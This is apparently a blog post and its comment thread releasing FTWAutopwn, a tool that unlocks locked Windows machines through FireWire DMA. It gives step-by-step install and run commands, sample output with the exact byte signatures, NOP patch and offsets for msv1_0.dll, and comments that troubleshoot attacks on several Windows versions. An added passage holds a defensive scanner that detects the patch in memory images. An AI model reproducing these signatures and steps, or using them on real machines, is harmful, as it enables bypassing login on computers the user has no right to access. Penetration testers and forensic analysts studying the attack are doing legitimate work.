
Update: FTWAutopwn is now named Inception. I’ve created a standalone page for the tool here; please refer to that page for updates on the tool.

Over the last few days I’ve been working on an alternative to winlockpwn (unlocking locked Windows boxes through FireWire SBP2 DMA) using libforensic1394. I’ve now released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn), on GitHub. Here’s how to use it:

Check that your distro uses the new IEEE1394 stack

$ ls /dev | grep fw

If the new stack is loaded and the system has at least one FireWire port, `fw0` should be printed. Additional ports/devices take the form `fw<n>`. If no devices are listed, the new stack is most likely not loaded. That sucks; if you’re running Debian/Ubuntu, try these commands:

sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394
sudo modprobe firewire-ohci

Download and install libforensic1394

sudo apt-get install git cmake python3
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz
tar xvf libforensic1394-0.2.tar.gz
cd libforensic1394-0.2
mkdir build
cd build
cmake -G"Unix Makefiles" ../
make
sudo make install
cd ../python
sudo python3 setup.py install

Download and use FTWAutopwn

cd
git clone https://github.com/carmaa/FTWAutopwn.git
cd FTWAutopwn
python3 ftwautopwn.py

The last command should now work. Connect your attacking machine to a locked Windows 7 or XP machine with an IEEE 1394 (FireWire) cable and run the command above. Select the correct target, and you’re off!

$ python3 ftwautopwn.py
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <[email protected]> 2011

For updates, check out https://github.com/carmaa/FTWAutopwn
[+] Available targets:
[1] Win7 32-bit msv1_0.dll technique
[2] Win7 64-bit msv1_0.dll technique
[3] WinXP SP2 msv1_0.dll technique
[4] WinXP SP3 msv1_0.dll technique
Please select target: 4
[+] You have selected: WinXP SP3 msv1_0.dll technique
    Using signature: 83f8107511b0018b
    Using patch: 83f8109090b0018b
    Using offset: 2146
[+] Searching for signature,   12 MiB so far.
[+] Signature found at 0xd7d862.
[+] Write-back verified; patching successful. Bon voyage!

You should now be able to log onto your target machine with any password.
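As an added example that is not part of the original post: a read-only forensic check a defender can run over a captured memory image (raw physical memory is assumed as the format) to see whether the XP SP3 MsvpPasswordValidate code is present, intact, or already NOPed, using the signature, patch and offset values printed above. Treating the tool’s "offset" as a page-relative offset is inferred from the 0x...862 address in the output and is an assumption.

```python
# Read-only forensic check: does a captured memory image contain the
# MsvpPasswordValidate code that FTWAutopwn targets, and is it intact or
# already NOPed? The byte values are the WinXP SP3 values printed by the
# tool above; the image format (raw physical memory) is an assumption.

SIGNATURE = bytes.fromhex("83f8107511b0018b")  # cmp eax,10h ; jnz +11h ; mov al,1 ; mov ...
PATCHED   = bytes.fromhex("83f8109090b0018b")  # same code with the jnz replaced by two NOPs
PAGE_OFFSET = 2146   # 0x862: the tool reports its hit at 0xd7d862, i.e. this offset inside a 4 KiB page
PAGE = 4096

def find_all(image: bytes, pattern: bytes) -> list:
    """Every offset at which pattern occurs in image."""
    hits, pos = [], image.find(pattern)
    while pos != -1:
        hits.append(pos)
        pos = image.find(pattern, pos + 1)
    return hits

def scan_image(image: bytes) -> list:
    """Return (state, address, offset_ok) for every intact or patched hit.
    offset_ok flags hits at the expected page-relative offset (assumption, see
    above); a hit elsewhere in a page is more likely a chance byte collision."""
    hits = []
    for state, pattern in (("intact", SIGNATURE), ("patched", PATCHED)):
        for addr in find_all(image, pattern):
            hits.append((state, addr, addr % PAGE == PAGE_OFFSET))
    return hits

def verdict(image: bytes) -> str:
    """'tampered' if the NOPed variant sits at the expected offset,
    'intact' if only the original code does, otherwise 'not-found'."""
    states = {state for state, _, ok in scan_image(image) if ok}
    if "patched" in states:
        return "tampered"
    if "intact" in states:
        return "intact"
    return "not-found"

def constructed_image(code: bytes, page_index: int = 5) -> bytes:
    """Constructed sample image: 8 zeroed pages with `code` placed at
    page_index * 4 KiB + 0x862, mimicking where the tool found it."""
    img = bytearray(8 * PAGE)
    base = page_index * PAGE + PAGE_OFFSET
    img[base:base + len(code)] = code
    return bytes(img)

if __name__ == "__main__":
    print("clean image:  ", verdict(constructed_image(SIGNATURE)))  # intact
    print("patched image:", verdict(constructed_image(PATCHED)))    # tampered
```

On a real dump, pass the file contents to `verdict()`; a "tampered" result means the authentication check was NOPed in memory at the time of capture, which the tool above leaves behind until the next reboot.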

Full syntax is provided by using the -h/--help switch:

$ python3 ftwautopwn.py -h
Fire Through the Wire Autopwn v.0.0.1
by Carsten Maartmann-Moe <[email protected]> 2011

For updates, check out https://github.com/carmaa/FTWAutopwn
Usage: ftwautopwn [OPTIONS]

    -d --delay=TIME:      Delay attack by TIME seconds. This is useful in order
                          to guarantee that the target machine has successfully
                          installed the SBP2 device before attacking. If the
                          attack fails, try to increase this value.
    -f --file=FILE:       Use a file instead of FireWire bus data as input; for
                          example to facilitate attacks on VMware machines or
                          to ease testing and signature generation efforts
    -h, --help:           Displays this message
    -l, --list:           Lists available target operating systems
    -n, --no-write:       Dry run, do not write back to memory
    -t TARGET, --target=TARGET:
                          Specify target operating system (use --list to list
                          available targets)
    -v/--verbose:         Verbose mode

18 Responses to “Fire through the wire”

  1. Koko

    Hi. Good job, but it seems that it has a dependency problem…

    python3 ftwautopwn.py -h
    Traceback (most recent call last):
    File "ftwautopwn.py", line 7, in <module>
    from ftwautopwn import unlock
    File "/home/bap-hmc/FTWAutopwn/ftwautopwn/unlock.py", line 7, in <module>
    from forensic1394 import Bus
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/__init__.py", line 1, in <module>
    from .bus import Bus
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/bus.py", line 25, in <module>
    from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
    File "/usr/local/lib/python3.2/dist-packages/forensic1394/functions.py", line 35, in <module>
    lib = cdll.LoadLibrary(loc)
    File "/usr/lib/python3.2/ctypes/__init__.py", line 418, in LoadLibrary
    return self._dlltype(name)
    File "/usr/lib/python3.2/ctypes/__init__.py", line 340, in __init__
    self._handle = _dlopen(self._name, mode)
    OSError: libforensic1394.so.1: cannot open shared object file: No such file or directory

    Did you already have this problem? Any solution?
    Thanks and regards.
    Koko

    • Carsten

      Let me guess: You’re using BackTrack? I ran into the same problem, it is not a dependency issue though. The trick is to set LD_LIBRARY_PATH to /usr/local/lib, where the libforensic1394 modules are:

      export LD_LIBRARY_PATH=/usr/local/lib

      Let me know if this doesn’t work.

      • koko

        Hi,
        No, I’m using the latest Ubuntu version (11.04).
        I solved the problem by copying the libforensic1394 library files (libforensic1394.a, libforensic1394.so.0.2.0, libforensic1394.so and libforensic1394.so.1) into /usr/lib/.
        Then it works perfectly!
        Regards,
        Koko

  2. Mike

    Very cool. It worked against an XP SP3 machine. But it didn’t work against a W7 SP1; does the signature have to be updated for W7 SP1?

    • Carsten

      What version of Win7 are you using (open a command shell and execute winver to check and paste the whole ‘Version’ string here)? I’ll update the signatures/offsets if they’ve changed.

      • mike

        Hi Carsten,
        I noticed that you updated the signature. I’ll give it a try. I also took a look at the link listed below. Very informative. But I noticed the offset in your code is quite different. Any chance to share how you go about finding signatures, etc.?

        • Carsten

          Actually, the signatures are almost the same; the only difference is that I’ve chosen to include the previous ASM instruction (cmp eax, 10h) in my signature (0x0F8550940000 in the article vs. 0x83F8100F85509400 in FTWAutopwn). When unlocking the screen through Metasploit it is also important to realize that Metasploit sees virtual address space as opposed to the physical address space seen by FTWAutopwn. That’s why Metasploit looks for the entry point of MsvpPasswordValidate first (the ‘sig’ variable in the array in the screen_unlock.rb script) before looking for the actual signature (the ‘orig_code’ variable).

          The method for finding signatures is really similar to the method described in the article; it requires a bit of disassembly but nothing too advanced. I’ll try to do a write-up on it sometime in the future; right now I’m trying to implement autodetection of OS and Service Pack level.

          • mike

            Thanks, Carsten. Looking forward to it. I tried the new signature against a W7 Enterprise 64-bit, Version 6.1 (build 7601: Service Pack 1). A couple of things I don’t quite get.
            1) Initially the machine had 8G memory in it; with the -v option, almost all the reads return 0.
            2) After I took out 4G memory, it seemed that I was getting non-zeros, but it still failed to find the signature.
            My guess is that this is yet another version of msv1_0.dll? I unfortunately haven’t got an IDA Pro that can do 64-bit DLLs yet. But this is something I’d seriously like to learn. Looking forward to your write-up.

          • Carsten

            Hmm. Looks like the signature’s much less stable on x64. The offset of the signature as well as the address of the jnz jump that we’re NOPing out are changing frequently as Microsoft make changes to the code.

            The main problem is that the jump address is > 46kB away from the jump code, so any change in the code in between will change the jump address. I’ll have to implement some kind of fuzzy matching in order to counter this. AFAIK the Win 7 32 bit signatures are stable for now, so for demo purposes I suggest attacking x32 architectures at the moment.

          • Michael Wu

            Thanks, Carsten. I appreciate that. I watched your presentation @password^11 too. I then came to realize that you were also the author of Interrogate, which I also used. Very cool stuff. Keep up the good work.

    • Mike

      Very informative. I followed through using an XP SP3 version of the DLL. Looks like I’ve got it. But I don’t get the purpose of this particular Metasploit script. If I already have a session on the box, what’s the point of unlocking the screen?

  3. Alex Cheng

    Finally got my cable. Tested it but it threw me this error:

    root@bt:/pentest/firewire/FTWAutopwn# python3.1 ftwautopwn.py
    Fire Through the Wire Autopwn v.0.0.2
    by Carsten Maartmann-Moe 2011

    For updates, check out https://github.com/carmaa/FTWAutopwn

    [+] Available targets:
    [1] Windows 7 SP1 (x86) msv1_0.dll MsvpPasswordValidate technique
    [2] Windows 7 SP1 (x64) msv1_0.dll MsvpPasswordValidate technique
    [3] Windows 7 (x86) msv1_0.dll MsvpPasswordValidate technique
    [4] Windows 7 (x64) msv1_0.dll MsvpPasswordValidate technique
    [5] Windows Vista (x86) msv1_0.dll MsvpPasswordValidate technique
    [6] Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    [7] Windows XP SP2 (x86) msv1_0.dll MsvpPasswordValidate technique
    [8] Apple OS X 10.6.4 and lower (Intel x64) DoShadowHashAuth technique
    [9] Ubuntu 9.04 (x86) Gnome lockscreen unlock

    Please select target (or enter 'q' to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File "ftwautopwn.py", line 78, in <module>
    main(sys.argv[1:])
    File "ftwautopwn.py", line 74, in main
    unlock.run(ctx)
    File "/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py", line 128, in run
    d = initialize_fw(d)
    File "/pentest/firewire/FTWAutopwn/ftwautopwn/unlock.py", line 253, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    Any idea? The winver of the tested machine is:

    Version 5.1 (Build 2600.xpsp_sp3_gdr.111025-1629 : Service Pack 3)

    Would love to try on the Vista but that machine does not have firewire… =(

    • Alex Cheng

      Also, something weird happened. I logged in on my victim’s XP SP3 machine (meaning Windows was not in lock-screen mode), and I re-ran FTWAutopwn. It managed to run (surprisingly), but the following happened:

      [+] Initializing bus and enabling SBP2, please wait 1 seconds or press Ctrl+C
      [*] Detecting memory size…
      4096 MiB main memory detected

      --snip--

      [+] Searching for signature, 4096 MiB so far.
      [+] Phase 2:
      [+] Searching for signature, 131 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/--verbose to debug.
      Continue? [Y/n]: y
      [+] Searching for signature, 146 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/--verbose to debug.
      Continue? [Y/n]: y
      [+] Searching for signature, 238 MiB so far.
      [+] Signature found at 0xee0f862.
      [-] Write-back could not be verified; patching unsuccessful.
      [!] Signature not found.
      [!] Attack unsuccessful.

      Sorry for spamming.

      • Carsten

        Sorry for the late reply. Try the experimental version instead, and post again here if you run into trouble. That’s the ftwa.py command.

        • Alex Cheng

          Carsten, it works beautifully now! Thanks! =D (I have McAfee running on the laptop I’m attempting to connect to, and it works.)
